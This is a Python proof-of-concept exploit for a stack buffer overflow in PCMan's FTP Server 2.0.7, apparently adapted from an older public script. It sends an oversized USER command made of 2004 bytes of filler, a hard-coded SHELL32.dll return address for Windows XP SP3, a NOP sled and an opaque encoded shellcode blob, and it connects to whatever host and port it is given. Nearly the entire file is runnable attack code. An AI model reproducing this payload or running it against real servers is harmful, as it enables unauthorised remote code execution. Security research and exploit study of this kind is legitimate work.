Final PCMan's FTP Server v2.0.7 Exploit
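# Final PCMan's FTP Server v2.0.7 Exploit
"""Stack buffer overflow PoC against PCMan's FTP Server 2.0.7 via the USER command.

One oversized ``USER`` argument is sent: 2004 bytes of filler to reach the
saved return address, a 4-byte return address inside SHELL32.dll on
Windows XP SP3 (per the original author's comment), a 20-byte NOP sled,
and the encoded shellcode below.

Usage::

    python exploit.py <host> <port>

Notes for anyone reusing this:

* Only run it against systems you are explicitly authorised to test; on a
  vulnerable target the payload executes arbitrary code.
* The shellcode is an opaque blob.  What it does (bind shell, reverse
  shell, calc, ...) is NOT stated in this file and cannot be derived from
  it -- disassemble it or detonate it in an isolated lab before trusting it.
* The offset (2004) and return address (0x7C9D30D7) are specific to the
  XP SP3 build of SHELL32.dll the original author tested against; other
  service packs / language builds will need them re-derived.
* The original was Python 2 and built the payload as ``str``; under
  Python 3 that would be UTF-8 encoded on send and corrupt every byte
  >= 0x80.  The payload is therefore built from ``bytes`` here, which also
  keeps the script working on Python 2.
"""
import socket
import struct
import sys
import time  # unused, kept from the original script

# Encoded shellcode from the original PoC, reproduced byte-for-byte (220
# bytes).  The early "d9 74 24 f4" (FNSTENV [ESP-0xC]) looks like the GetPC
# stub of an msfvenom-style encoder -- TODO confirm by disassembling.
SHELLCODE = (
    b"\xda\xdf\xd9\x74\x24\xf4\x5b\xbe\xba\x06\x35\xe1\x31"
    b"\xc9\xb1\x31\x83\xc3\x04\x31\x73\x14\x03\x73\xae\xe4"
    b"\xc0\x1d\x26\x6a\x2a\xde\xb6\x0b\xa2\x3b\x87\x0b\xd0"
    b"\x48\xb7\xbb\x92\x1d\x3b\x37\xf6\xb5\xc8\x35\xdf\xba"
    b"\x79\xf3\x39\xf4\x7a\xa8\x7a\x97\xf8\xb3\xae\x77\xc1"
    b"\x7b\xa3\x76\x06\x61\x4e\x2a\xdf\xed\xfd\xdb\x54\xbb"
    b"\x3d\x57\x26\x2d\x46\x84\xfe\x4c\x67\x1b\x75\x17\xa7"
    b"\x9d\x5a\x23\xee\x85\xbf\x0e\xb8\x3e\x0b\xe4\x3b\x97"
    b"\x42\x05\x97\xd6\x6b\xf4\xe9\x1f\x4b\xe7\x9f\x69\xa8"
    b"\x9a\xa7\xad\xd3\x40\x2d\x36\x73\x02\x95\x92\x82\xc7"
    b"\x40\x50\x88\xac\x07\x3e\x8c\x33\xcb\x34\xa8\xb8\xea"
    b"\x9a\x39\xfa\xc8\x3e\x62\x58\x70\x66\xce\x0f\x8d\x78"
    b"\xb1\xf0\x2b\xf2\x5f\xe4\x41\x59\x35\xfb\xd4\xe7\x7b"
    b"\xfb\xe6\xe7\x2b\x94\xd7\x6c\xa4\xe3\xe7\xa6\x81\x1c"
    b"\xa2\xeb\xa3\xb4\x6b\x7e\xf6\xd8\x8b\x54\x34\xe5\x0f"
    b"\x5d\xc4\x12\x0f\x14\xc1\x5f\x97\xc4\xbb\xf0\x72\xeb"
    b"\x68\xf0\x56\x88\xef\x62\x3a\x61\x8a\x02\xd9\x7d"
)

# Return address 0x7C9D30D7 in SHELL32.dll (Win XP SP3, per the original
# comment).  Presumably a JMP ESP-style trampoline into the NOP sled that
# follows it on the stack -- verify in a debugger before reusing.
RET_ADDR = 0x7C9D30D7
# Bytes of filler needed to reach the saved return address (EIP offset).
OFFSET_TO_RET = 2004
# Length of the NOP sled between the return address and the shellcode.
NOP_SLED_LEN = 20
# The original blocked forever on recv() if the target never sent a banner.
DEFAULT_TIMEOUT = 10.0


def build_payload(offset=OFFSET_TO_RET, ret_addr=RET_ADDR,
                  nop_count=NOP_SLED_LEN, shellcode=SHELLCODE):
    """Return the overflow string: filler -> return address -> NOPs -> shellcode.

    Args:
        offset: number of ``b"A"`` filler bytes before the saved return address.
        ret_addr: 32-bit address written over EIP; packed little-endian.
        nop_count: length of the ``0x90`` sled preceding the shellcode.
        shellcode: raw bytes to place after the sled.

    Returns:
        ``bytes`` of length ``offset + 4 + nop_count + len(shellcode)``.
    """
    filler = b"A" * offset
    ret = struct.pack("<I", ret_addr)  # little-endian, as on x86
    sled = b"\x90" * nop_count
    return filler + ret + sled + shellcode


def exploit(host, port, timeout=DEFAULT_TIMEOUT):
    """Connect to ``host:port``, read the FTP banner and send the oversized USER.

    Args:
        host: target IP or hostname.
        port: target TCP port (usually 21).
        timeout: socket timeout in seconds for connect/recv/send.

    Raises:
        socket.error / OSError on connection failure or timeout.
    """
    client = socket.create_connection((host, port), timeout=timeout)
    try:
        client.recv(1024)  # consume the FTP banner before issuing a command
        # No CRLF is appended, matching the original PoC; if the target only
        # parses a command at end-of-line, append b"\r\n" here.
        # sendall() is used because send() may transmit only part of a
        # ~2.2 KiB buffer.
        client.sendall(b"USER " + build_payload())
    finally:
        client.close()


def main(argv=None):
    """Entry point: ``exploit.py <host> <port>``; exits with usage on bad args."""
    argv = sys.argv if argv is None else argv
    if len(argv) != 3:
        sys.exit("usage: %s <host> <port>" % argv[0])
    host = argv[1]  # Receive IP from user
    port = int(argv[2])  # Receive port from user
    exploit(host, port)


if __name__ == "__main__":
    main()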